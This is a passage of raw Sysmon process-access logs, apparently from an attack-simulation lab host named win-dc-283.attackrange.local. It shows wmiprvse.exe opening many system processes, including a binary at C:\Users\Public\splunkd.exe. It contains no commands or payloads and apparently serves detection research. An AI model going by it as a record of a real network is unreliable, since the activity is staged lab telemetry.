Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023133Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.804{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023132Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.804{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023131Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.804{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023130Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.804{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023129Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.804{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023128Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.804{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023127Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.804{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023126Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.804{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023125Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.788{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023124Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.788{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023123Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.788{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023122Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.788{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023121Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.788{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023120Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.788{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023119Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.788{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023118Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.788{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023117Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.788{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023116Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.788{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023115Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.788{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023114Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 